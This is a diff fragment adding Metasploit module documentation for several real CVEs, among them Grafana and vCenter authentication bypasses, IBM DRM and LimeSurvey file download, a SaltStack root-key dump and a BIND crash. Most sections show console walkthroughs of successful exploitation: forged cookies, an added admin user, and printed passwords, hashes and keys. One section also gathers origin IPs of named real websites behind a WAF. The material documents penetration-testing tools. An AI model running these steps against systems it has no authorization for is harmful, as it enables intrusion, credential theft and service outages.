+msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator
+USERNAME => Administrator
+msf5 auxiliary(admin/http/grafana_auth_bypass) > run
+
+[*] Running for 192.168.202.3...
+[+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f
+[+] Set following cookies to get access to the grafana instance.
+[+] grafana_user=Administrator;
+[+] grafana_remember=a232b98b9365d3d8f7ce253adfb9779f1114131a68cc8cbb4a53ee6f5cb71acfbe25773e95db051021;
+[+] grafana_sess=4ecdc0c13ebca229;
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/admin/http/ibm_drm_download.md

@@ -0,0 +1,36 @@
+## Vulnerable Application
+
+IBM Data Risk Manager (IDRM) contains two vulnerabilities that can be chained by an unauthenticated attacker to download arbitrary files off the system.
+The first is an unauthenticated bypass, followed by a path traversal.
+This module exploits both vulnerabilities, giving an attacker the ability to download (non-root) files.
+A downloaded file is zipped, and this module also unzips it before storing it in the database.
+By default, this module downloads Tomcat's 1application.properties` files, which contains the database password, amongst other sensitive data.
+At the time of disclosure, this is a 0day. Versions 2.0.3 and 2.0.2 are confirmed to be affected, and the latest 2.0.6 is most likely affected too. Version 2.0.1 is not vulnerable.
+
+### Vulnerability information
+For more information about the vulnerability check the advisory at:
+https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm\_drm/ibm\_drm\_rce.md
+
+### Setup
+
+The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.
+
+## Verification Steps
+
+Module defaults work very well, you should just need to set `RHOST` and the `FILEPATH` you want to download.
+
+## Scenarios
+
+A successful exploit will look like this:
+
+```
+msf5 auxiliary(admin/http/ibm_drm_file_download) > run
+
+[+] 10.9.8.213:8443 - Successfully "stickied" our session ID kmhleyPh
+[+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1
+[+] 10.9.8.213:8443 - We're now authenticated as admin!
+[+] File saved in: /home/conta/.msf4/loot/20200421154045_default_10.9.8.213_IBM_DRM.http_402604.bin
+[*] Auxiliary module execution completed
+```
+
+- Verify that the file was saved in the location specified.

documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md

@@ -0,0 +1,125 @@
+## Vulnerable Application
+
+### Description
+
+This module bypasses LDAP authentication in VMware vCenter Server's
+vmdir service to add an arbitrary administrator user. Version 6.7
+prior to the 6.7U3f update is vulnerable.
+
+### Setup
+
+Tested in the wild. No setup notes available at this time, as setup will
+be specific to target environment.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Add
+
+Add an admin user to the vCenter Server.
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### USERNAME
+
+Set this to the username for the new admin user.
+
+### PASSWORD
+
+Set this to the password for the new admin user.
+
+### ConnectTimeout
+
+You may configure the timeout for LDAP connects if necessary. The
+default is 10.0 seconds and should be more than sufficient.
+
+## Scenarios
+
+### VMware vCenter Server 6.7 virtual appliance on ESXi
+
+```
+msf5 > use auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > options
+
+Module options (auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BASE_DN                    no        LDAP base DN if you already have it
+   PASSWORD                   no        Password of admin user to add
+   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT     389              yes       The target port
+   USERNAME                   no        Username of admin user to add
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Add   Add an admin user
+
+
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted]
+rhosts => [redacted]
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set username msfadmin
+username => msfadmin
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set password msfadmin
+password => msfadmin
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run
+[*] Running module against [redacted]
+
+[*] Using auxiliary/gather/vmware_vcenter_vmdir_ldap as check
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+dn: cn=DSE Root
+namingcontexts: dc=vsphere,dc=local
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
+supportedcontrol: 1.2.840.113556.1.4.417
+supportedcontrol: 1.2.840.113556.1.4.319
+supportedldapversion: 3
+supportedsaslmechanisms: GSSAPI
+
+[+] Discovered base DN: dc=vsphere,dc=local
+[*] Dumping LDAP data from vmdir service at [redacted]:389
+[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002255_default_[redacted]_VMwarevCenterS_975097.txt
+[*] Password and lockout policy:
+dn: cn=password and lockout policy,dc=vsphere,dc=local
+cn: password and lockout policy
+enabled: TRUE
+ntsecuritydescriptor:: [redacted]
+objectclass: top
+objectclass: vmwLockoutPolicy
+objectclass: vmwPasswordPolicy
+objectclass: vmwPolicy
+vmwpasswordchangeautounlockintervalsec: [redacted]
+vmwpasswordchangefailedattemptintervalsec: [redacted]
+vmwpasswordchangemaxfailedattempts: [redacted]
+vmwpasswordlifetimedays: [redacted]
+vmwpasswordmaxidenticaladjacentchars: [redacted]
+vmwpasswordmaxlength: [redacted]
+vmwpasswordminalphabeticcount: [redacted]
+vmwpasswordminlength: [redacted]
+vmwpasswordminlowercasecount: [redacted]
+vmwpasswordminnumericcount: [redacted]
+vmwpasswordminspecialcharcount: [redacted]
+vmwpasswordminuppercasecount: [redacted]
+vmwpasswordprohibitedpreviouscount: [redacted]
+
+[*] Bypassing LDAP auth in vmdir service at [redacted]:389
+[*] Adding admin user msfadmin with password msfadmin
+[+] Added user msfadmin, so auth bypass was successful!
+[+] Added user msfadmin to admin group
+[*] Auxiliary module execution completed
+msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) >
+```

documentation/modules/auxiliary/admin/ubiquiti/ubiquiti_config.md

@@ -0,0 +1,78 @@
+## General Notes
+
+  This module imports an Ubiquiti Unifi configuration file into the database.
+  This is similar to `post/multi/gather/ubiquiti_unifi_backup` only access isn't required,
+  and assumes you already have the file.
+
+  This module is able to take a unf file, from the controller and perform the following actions:
+
+  1. Decrypt the file
+  2. Fix the zip file if a `zip` utility is on the system
+  3. Extract db.gz
+  4. Unzip the db file
+  5. Import the db file
+
+  Or simply pass the db file for import directly.
+
+## Verification Steps
+
+1. Have a Ubiquiti Unifi configuration file (db or unf)
+2. Start `msfconsole`
+3. `use auxiliary/admin/ubiquiti/ubiquiti_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.unf`
+6. `run`
+
+## Options
+
+  **RHOST**
+
+  Needed for setting services and items to.  This is relatively arbitrary.
+
+  **CONFIG**
+
+  File path to the configuration unf or db file..
+
+## Scenarios
+
+### Unf File
+```
+resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
+resource (unifi_config.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+resource (unifi_config.rb)> set config /root/.msf4/loot/20190825172544_default_1.1.1.1_ubiquiti.unifi.b_740136.unf
+config => /root/.msf4/loot/20190825172544_default_1.1.1.1_ubiquiti.unifi.b_740136.unf
+resource (unifi_config.rb)> run
+[*] Running module against 127.0.0.1
+[+] File DECRYPTED.  Still needs to be repaired
+[*] Attempting to repair zip file (this is normal and takes some time)
+[+] File DECRYPTED and REPAIRED and saved to /tmp/fixed_zip.zip20190825-6283-1merolj.
+[*] extracting db.gz
+[*] Converting config BSON to JSON
+[+] Admin user unifiadmin with email admin@unifi.com found with password hash $6$R6qnBHgF$CHYrf4t.fXu0pcoloju5a85m3ujrjJLhIO.lN1xZqHZPQoUXXsJB98jgtsvt4Qo2/8t3epzbVLiba7Ls7GCVxcV.
+[+] Radius server: 1.1.1.1:1812 with secret ''
+[+] Mesh Wifi Network vwire-111117d211c1c1ea password 113b9b872b1114a9111f1a11ae11cdfe
+[+] SSH user admin found with password lyxGYOF9UalubyyG and hash $6$37uelU/k$EkJuteQiAIP.CrRaJj4xC9gt61n95FJP3fQuQQmE9TqtFKtmIGsV5XSIJI.muBLOMKMkdlsPl8E3BvjJit.F21
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+### db File
+
+```
+resource (unifi_config.rb)> use auxiliary/admin/ubiquiti/ubiquiti_config
+resource (unifi_config.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > set config /root/.msf4/loot/db
+config => /root/.msf4/loot/db
+msf5 auxiliary(admin/ubiquiti/ubiquiti_config) > run
+[*] Running module against 127.0.0.1
+
+[*] Converting config BSON to JSON
+[+] Admin user unifiadmin with email admin@unifi.com found with password hash $6$R6qnBHgF$CHYrf4t.fXu0pcoloju5a85m3ujrjJLhIO.lN1xZqHZPQoUXXsJB98jgtsvt4Qo2/8t3epzbVLiba7Ls7GCVxcV.
+[+] Radius server: 1.1.1.1:1812 with secret ''
+[+] Mesh Wifi Network vwire-111117d211c1c1ea password 113b9b872b1114a9111f1a11ae11cdfe
+[+] SSH user admin found with password lyxGYOF9UalubyyG and hash $6$37uelU/k$EkJuteQiAIP.CrRaJj4xC9gt61n95FJP3fQuQQmE9TqtFKtmIGsV5XSIJI.muBLOMKMkdlsPl8E3BvjJit.F21
+[+] Config import successful
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/dos/dns/bind_tsig_badtime.md

@@ -0,0 +1,53 @@
+## Vulnerable Application
+The following versions of BIND.
+
+- 9.0.0 -> 9.11.18
+- 9.12.0 -> 9.12.4-P2
+- 9.14.0 -> 9.14.11
+- 9.16.0 -> 9.16.2
+- 9.17.0 -> 9.17.1 of the 9.17 experimental development branch.
+- All releases in the obsolete 9.13 and 9.15 development branches.
+- All releases of BIND Supported Preview Edition from 9.9.3-S1 -> 9.11.18-S1.
+
+The attacker must know the name of the real TSIGKey on the target in order to exploit CVE-2020-8617. However, by
+default, BIND generates a TSIGKey that name of  "local-ddns" at boot time. As such, the majority of target versions are
+vulnerable to this attack.
+
+```
+$ sudo cat /var/run/named/session.key
+key "local-ddns" {
+        algorithm hmac-sha256;
+        secret "s/+GOoQRryn/VVndpmFHsgDOBLwndh1zEjVJLK5jo04=";
+};
+
+```
+
+## Verification Steps
+  1. Start the vulnerable server
+  2. Start `msfconsole`
+  3. Do: ```use auxiliary/dos/dns/bind_tsig_badtime```
+  4. Do: ```run```
+  5. The server should crash
+
+## Options
+
+## Scenarios
+
+### Server output from crash
+
+```
+26-May-2020 02:45:59.565 general: critical: tsig.c:954: INSIST(msg->verified_sig) failed, back trace
+26-May-2020 02:45:59.565 general: critical: #0 0x563435d6aa40 in __do_global_dtors_aux_fini_array_entry()+0x5634357f6888
+26-May-2020 02:45:59.565 general: critical: #1 0x563435f49c0a in __do_global_dtors_aux_fini_array_entry()+0x5634359d5a52
+26-May-2020 02:45:59.565 general: critical: #2 0x563435ecfcb9 in __do_global_dtors_aux_fini_array_entry()+0x56343595bb01
+26-May-2020 02:45:59.565 general: critical: #3 0x563435e14b19 in __do_global_dtors_aux_fini_array_entry()+0x5634358a0961
+26-May-2020 02:45:59.565 general: critical: #4 0x563435d5b57f in __do_global_dtors_aux_fini_array_entry()+0x5634357e73c7
+26-May-2020 02:45:59.565 general: critical: #5 0x563435d5cffd in __do_global_dtors_aux_fini_array_entry()+0x5634357e8e45
+26-May-2020 02:45:59.565 general: critical: #6 0x563435d5d6a8 in __do_global_dtors_aux_fini_array_entry()+0x5634357e94f0
+26-May-2020 02:45:59.565 general: critical: #7 0x563435d5f1a7 in __do_global_dtors_aux_fini_array_entry()+0x5634357eafef
+26-May-2020 02:45:59.565 general: critical: #8 0x563435f716d9 in __do_global_dtors_aux_fini_array_entry()+0x5634359fd521
+26-May-2020 02:45:59.565 general: critical: #9 0x7f6513f576db in __do_global_dtors_aux_fini_array_entry()+0x7f65139e3523
+26-May-2020 02:45:59.565 general: critical: #10 0x7f6513c8088f in __do_global_dtors_aux_fini_array_entry()+0x7f651370c6d7
+26-May-2020 02:45:59.565 general: critical: exiting (due to assertion failure)
+```
+

documentation/modules/auxiliary/gather/cloud_lookup.md

@@ -0,0 +1,214 @@
+This module can be useful if you need to test the security of your server and your
+website behind a solution Cloud based. By discovering the origin IP address of the
+targeted host.
+
+More precisely, this module uses multiple data sources (in order ViewDNS.info, DNS enumeration and Censys)
+to collect assigned (or have been assigned) IP addresses from the targeted site or domain
+that uses the following:
+  Amazon Cloudflare, Amazon CloudFront, ArvanCloud, Envoy Proxy, Fastly, Stackpath Fireblade,
+  Stackpath MaxCDN, Imperva Incapsula, InGen Security (BinarySec EasyWAF), KeyCDN, Microsoft AzureCDN,
+  Netlify and Sucuri.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use auxiliary/gather/cloud_lookup`
+  3. Do: `set hostname www.zataz.com`
+  4. Do: `run`
+
+## Options
+
+### CENSYS_SECRET
+
+Your Censys API SECRET.
+
+### CENSYS_UID
+
+Your Censys API UID.
+
+### COMPSTR
+
+You can use a custom string to perform the comparison.
+
+### HOSTNAME
+
+This is the hostname [fqdn] on which the website responds. But this can also be a domain.
+
+msf5 auxiliary(gather/cloud_lookup) > set hostname www.zataz.com
+--or--
+msf5 auxiliary(gather/cloud_lookup) > set hostname discordapp.com
+
+### IPBLACKLIST_FILE
+
+Files containing IP addresses to blacklist during the analysis process, one per line. It's optional.
+
+### THREADS
+
+Number of concurent threads needed for DNS enumeration. Default: 8
+
+### WORDLIST
+
+Name list required for DNS enumeration. Default: ~/metasploit-framework/data/wordlists/namelist.txt
+
+## Advanced options
+
+### ALLOW_NOWAF
+
+Automatically switch to NoWAFBypass when detection fails with the Automatic action. Default: false
+
+### NS
+
+Specify the nameserver to use for queries. Default: is system DNS
+
+### REPORT_LEAKS
+
+Set to write leaked ip addresses in notes. Default: false
+
+### USERAGENT
+
+Specify a personalized User-Agent header in HTTP requests.
+Default: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+
+### TAG
+
+Specify the HTML tag in which you want to find the fingerprint. Default: title
+Useful when combined with the CMPSTR option.
+
+### HTTP_TIMEOUT
+
+HTTP(s) request timeout. Default: 8
+
+## Scenarios
+
+### For auditing purpose
+
+If successful, you must be able to obtain the IP(s) address of the website as follows:
+
+```
+msf5 auxiliary(gather/cloud_lookup) > set verbose true
+verbose => true
+msf5 auxiliary(gather/cloud_lookup) > run
+
+[*] Selected action: Amazon CloudFlare
+[*] Passive gathering information...
+[*]  * ViewDNS.info: 17 IP address found(s).
+[*]  * DNS Enumeration: 6 IP address found(s).
+[*] Clean Amazon CloudFlare server(s)...
+[*]  * TOTAL: 10 IP address found(s) after cleaning.
+[*]
+[*] Bypass Automatic is in progress...
+[*]  * Initial request to the original server for <title> comparison
+[*]  * Trying: http://XXX.XXX.XXX.XXX:80/
+[+] A direct-connect IP address was found: http://XXX.XXX.XXX.XXX:80/
+[*]  * Trying: https://XXX.XXX.XXX.XXX:443/
+      --> responded with an unhandled HTTP status code: 504
+[*]  * Trying: http://XXX.XXX.XXX.XXX:80/
+[*]  * Trying: https://XXX.XXX.XXX.XXX:443/
+[*]  * Trying: http://XXX.XXX.XXX.XXX:80/
+[+] A direct-connect IP address was found: http://XXX.XXX.XXX.XXX:80/
+[*]  * Trying: https://XXX.XXX.XXX.XXX:443/
+      --> responded with an unhandled HTTP status code: 504
+[*]  * Trying: http://XXX.XXX.XXX.XXX:80/
+[+] A direct-connect IP address was found: http://XXX.XXX.XXX.XXX:80/
+[*]  * Trying: https://XXX.XXX.XXX.XXX:443/
+      --> responded with an unhandled HTTP status code: 403
+[*] Auxiliary module execution completed
+```
+
+In this case 'A direct-connect IP address was found' is reported.
+
+However, some disreputable administrators used a simple redircetion (301 and 302)
+to force the passage through the WAF. This makes the IP address leak in the 'location'
+parameter of the HTTP header.
+
+For example:
+
+```
+msf5 auxiliary(gather/cloud_lookup) > set hostname www.exodata.fr
+hostname => www.exodata.fr
+msf5 auxiliary(gather/cloud_lookup) > run
+
+[*] Selected action: Amazon CloudFlare
+[*] Passive gathering information...
+[*]  * ViewDNS.info: 3 IP address found(s).
+[*]  * DNS Enumeration: 12 IP address found(s).
+[*] Clean Amazon CloudFlare server(s)...
+[*]  * TOTAL: 4 IP address found(s) after cleaning.
+[*]
+[*] Bypass Automatic is in progress...
+[*]  * Initial request to the original server for <title> comparison
+[*]  * Trying: http://41.213.135.13:80/
+[*]  * Trying: https://41.213.135.13:443/
+	--> responded with HTTP status code: 302 to http://www.exodata.fr/
+[!] A leaked IP address was found: https://41.213.135.13:443/
+[*]  * Trying: http://185.161.8.26:80/
+	--> responded with HTTP status code: 302 to https://www.exodata.fr/
+[!] A leaked IP address was found: http://185.161.8.26:80/
+[*]  * Trying: https://185.161.8.26:443/
+[-] No direct-connect IP address found :-(
+[*] Auxiliary module execution completed
+```
+
+*or*
+
+```
+msf5 auxiliary(gather/cloud_lookup) > set verbose false
+verbose => false
+msf5 auxiliary(gather/cloud_lookup) > set hostname www.ingensecurity.com
+hostname => www.ingensecurity.com
+msf5 auxiliary(gather/cloud_lookup) > run
+
+[*] Passive gathering information...
+[*]  * ViewDNS.info: 2 IP address found(s).
+[*]  * DNS Enumeration: 8 IP address found(s).
+[*] Clean InGen Security (BinarySec EasyWAF) server(s)...
+[*]  * TOTAL: 4 IP address found(s) after cleaning.
+[*]
+[*] Bypass Automatic is in progress...
+[*]  * Initial request to the original server for <title> comparison
+[!] A leaked IP address was found: http://188.165.33.235:80/
+[-] No direct-connect IP address found :-(
+[*] Auxiliary module execution completed
+```
+
+In this case 'A leaked IP address was found' is displayed but the bypass
+is NOT effective.
+
+You can also use the `REPORT_LEAKS` option to write that in the notes.
+
+For some reason you may need to change the URI path to interoperate with
+a page other than the index page.
+
+For example:
+
+```
+msf5 > use auxiliary/gather/cloud_lookup
+msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com
+hostname => www.zataz.com
+msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/
+uripath => /contacter/
+msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ
+compstr => Contacter ZATAZ
+msf5 auxiliary(gather/cloud_lookup) > run
+...
+```
+
+*or*
+
+```
+msf5 > use auxiliary/gather/cloud_lookup
+msf5 auxiliary(gather/cloud_lookup) > set HOSTNAME www.zataz.com
+hostname => www.zataz.com
+msf5 auxiliary(gather/cloud_lookup) > set URIPATH /contacter/
+uripath => /contacter/
+msf5 auxiliary(gather/cloud_lookup) > set compstr Contacter ZATAZ
+compstr => Contacter ZATAZ
+msf5 auxiliary(gather/cloud_lookup) > set tag html
+tag => html
+msf5 auxiliary(gather/cloud_lookup) > run
+...
+```
+
+## References
+
+  1. <https://citadelo.com/en/blog/cloudflare-how-to-do-it-right-and-do-not-reveal-your-real-ip/>

documentation/modules/auxiliary/gather/saltstack_salt_root_key.md

@@ -0,0 +1,123 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits unauthenticated access to the `_prep_auth_info()`
+method in the SaltStack Salt master's ZeroMQ request server, for
+versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the
+root key used to authenticate administrative commands to the master.
+
+VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are
+known to be affected by the Salt vulnerabilities.
+
+Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
+well as Vulhub's Docker image.
+
+### Setup
+
+**Note:** I did the bulk of my testing after manually installing Salt in
+an [Ubuntu 18.04 VM](#using-a-virtual-machine), but the [Docker image
+from Vulhub](#using-docker) may be quicker. YMMV.
+
+#### Using a virtual machine
+
+1. Set up an Ubuntu 18.04 VM
+2. Browse to [SaltStack's instructions for
+   Ubuntu](https://repo.saltstack.com/#ubuntu)
+3. Select `Pin to Minor Release` and change all versions to either
+   **2019.2.3** or **3000.1**, depending on the version you wish to test
+4. Follow the instructions, installing only the `salt-master` and
+   `salt-minion` packages necessary for testing
+5. Follow the [post-installation
+   configuration](https://docs.saltstack.com/en/latest/ref/configuration/index.html)
+
+You may now begin testing.
+
+#### Using Docker
+
+**Prerequisites:** [Docker](https://docs.docker.com/get-docker/) and
+[Docker Compose](https://docs.docker.com/compose/install/) must be
+installed first.
+
+**Note:** The Salt master is already configured and running in the
+following scenario. The majority of the steps below are for configuring
+and starting the minion. Version **2019.2.3** will be used.
+
+1. Run `git clone https://github.com/vulhub/vulhub`
+2. Run `cd vulhub/saltstack/CVE-2020-11651`
+3. Run `docker-compose up -d` to start the container in the background
+4. Run `docker exec -it cve-2020-11651_saltstack_1 bash` to drop to a
+   root shell inside the container
+5. Run `echo $'127.0.0.1\tsalt' >> /etc/hosts` to add the master to
+   `/etc/hosts` (this allows the minion to find the master)
+6. Run `salt-minion -d` to execute the minion in the background
+7. Run `salt-key -A` and accept the key for the minion
+
+You may now begin testing.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+This dumps the Salt master's root key by sending the `_prep_auth_info()`
+method and extracting the key from the resulting serialized auth info.
+
+## Scenarios
+
+### SaltStack Salt 2019.2.3 on Ubuntu 18.04
+
+```
+msf5 > use auxiliary/gather/saltstack_salt_root_key
+msf5 auxiliary(gather/saltstack_salt_root_key) > options
+
+Module options (auxiliary/gather/saltstack_salt_root_key):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT   4506             yes       The target port (TCP)
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump root key from Salt master
+
+
+msf5 auxiliary(gather/saltstack_salt_root_key) > set rhosts 172.28.128.5
+rhosts => 172.28.128.5
+msf5 auxiliary(gather/saltstack_salt_root_key) > run
+[*] Running module against 172.28.128.5
+
+[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
+[*] 172.28.128.5:4506 - Negotiating signature
+[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
+[*] 172.28.128.5:4506 - Sending identical signature
+[*] 172.28.128.5:4506 - Negotiating version
+[+] 172.28.128.5:4506 - Received compatible version: "\x03"
+[*] 172.28.128.5:4506 - Sending identical version
+[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
+[+] 172.28.128.5:4506 - Received NULL security mechanism
+[*] 172.28.128.5:4506 - Sending NULL security mechanism
+[*] 172.28.128.5:4506 - Sending READY command of type REQ
+[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
+[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
+[+] 172.28.128.5:4506 - Received serialized auth info
+[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
+[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/saltstack_salt_root_key) > creds
+Credentials
+===========
+
+host          origin        service                 public  private                                                                       realm  private_type  JtR Format
+----          ------        -------                 ------  -------                                                                       -----  ------------  ----------
+172.28.128.5  172.28.128.5  4506/tcp (salt/zeromq)  root    bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=         Password
+
+msf5 auxiliary(gather/saltstack_salt_root_key) >
+```

documentation/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.md

@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+### Description
+
+This module uses an anonymous-bind LDAP connection to dump data from
+the vmdir service in VMware vCenter Server version 6.7 prior to the
+6.7U3f update.
+
+### Setup
+
+Tested in the wild. No setup notes available at this time, as setup will
+be specific to target environment.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Actions
+
+### Dump
+
+Dump all LDAP data from the vCenter Server.
+
+## Options
+
+### BASE_DN
+
+If you already have the LDAP base DN, you may set it in this option.
+
+### ConnectTimeout
+
+You may configure the timeout for LDAP connects if necessary. The
+default is 10.0 seconds and should be more than sufficient.
+
+## Scenarios
+
+### VMware vCenter Server 6.7 virtual appliance on ESXi
+
+```
+msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
+
+Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   BASE_DN                   no        LDAP base DN if you already have it
+   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT    389              yes       The target port
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   Dump  Dump all LDAP data
+
+
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
+rhosts => [redacted]
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
+[*] Running module against [redacted]
+
+[*] Discovering base DN automatically
+[*] Searching root DSE for base DN
+dn: cn=DSE Root
+namingcontexts: dc=vsphere,dc=local
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
+supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
+supportedcontrol: 1.2.840.113556.1.4.417
+supportedcontrol: 1.2.840.113556.1.4.319
+supportedldapversion: 3
+supportedsaslmechanisms: GSSAPI
+
+[+] Discovered base DN: dc=vsphere,dc=local
+[*] Dumping LDAP data from vmdir service at [redacted]:389
+[+] [redacted]:389 is vulnerable to CVE-2020-3952
+[*] Storing LDAP data in loot
+[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
+[*] Password and lockout policy:
+dn: cn=password and lockout policy,dc=vsphere,dc=local
+cn: password and lockout policy
+enabled: TRUE
+ntsecuritydescriptor:: [redacted]
+objectclass: top
+objectclass: vmwLockoutPolicy
+objectclass: vmwPasswordPolicy
+objectclass: vmwPolicy
+vmwpasswordchangeautounlockintervalsec: [redacted]
+vmwpasswordchangefailedattemptintervalsec: [redacted]
+vmwpasswordchangemaxfailedattempts: [redacted]
+vmwpasswordlifetimedays: [redacted]
+vmwpasswordmaxidenticaladjacentchars: [redacted]
+vmwpasswordmaxlength: [redacted]
+vmwpasswordminalphabeticcount: [redacted]
+vmwpasswordminlength: [redacted]
+vmwpasswordminlowercasecount: [redacted]
+vmwpasswordminnumericcount: [redacted]
+vmwpasswordminspecialcharcount: [redacted]
+vmwpasswordminuppercasecount: [redacted]
+vmwpasswordprohibitedpreviouscount: [redacted]
+
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
+```

documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md

@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+This module attempts to identify the web management interfaces of the following F5 Networks devices:
+
+ * BigIP
+ * BigIQ
+ * Enterprise Manager
+ * ARX
+ * FirePass
+
+## Verification Steps
+
+  1. Install the application/hardware
+  2. Start msfconsole
+  3. Do: ```use scanner/http/f5_mgmt_scanner```
+  4. DO: ```set rhosts```
+  5. Do: ```run```
+  6. You will learn if IPs in rhosts are F5 web management interfaces
+
+## Options
+
+## Scenarios
+
+### BigIP 15.1.0.2 Virtual-Edition
+
+  ```
+  msf5 auxiliary(scanner/http/f5_mgmt_scanner) > run
+  
+  [+] F5 BigIP web management interface found
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md

@@ -0,0 +1,134 @@
+## Vulnerable Application
+
+This module exploits an authenticated path traversal vulnerability found in LimeSurvey versions between 4.0 and 4.1.11 with
+CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960, inclusive.
+
+In CVE-2020-11455 the `getZipFile` function within the `filemanager` functionality allows for arbitrary file download. The file retrieved
+may be deleted after viewing.
+
+In CVE-2019-9960 the `szip` function within the `downloadZip` functionality allows for arbitrary file download.
+
+This module has been verified against the following versions:
+
+  * 4.1.11-200316
+  * 3.15.0-181008
+  * 3.9.0-180604
+  * 3.6.0-180328
+  * 3.0.0-171222
+  * 2.70.0-170921
+
+### Install
+
+This application is straight forward to install.  An excellent writeup is available on
+[howtoforge.com](https://www.howtoforge.com/tutorial/how-to-install-limesurvey-on-ubuntu-1804/)
+
+Versions can be downloaded from [github](https://github.com/LimeSurvey/LimeSurvey/releases).
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/limesurvey_zip_traversals```
+  4. Do: ```set file [file]```
+  5. Do: ```set rhosts [ip]```
+  6. Do: ```run```
+  7. If the file is readable, you should retrieve a file from the application
+
+## Options
+
+### FILE
+
+The file to attempt to retrieve
+
+## Scenarios
+
